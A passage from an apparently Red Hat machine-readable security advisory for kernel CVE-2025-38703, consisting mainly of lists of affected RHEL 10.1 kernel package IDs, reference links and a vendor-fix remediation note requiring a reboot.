"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-38703"
},
{
"category": "external",
"summary": "RHBZ#2393157",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2393157"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-38703",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38703"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-38703",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38703"
},
{
"category": "external",
"summary": "https://lore.kernel.org/linux-cve-announce/2025090453-CVE-2025-38703-2f5c@gregkh/T",
"url": "https://lore.kernel.org/linux-cve-announce/2025090453-CVE-2025-38703-2f5c@gregkh/T"
}
],
"release_date": "2025-09-04T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-09T10:02:53+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect.",
"product_ids": [
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
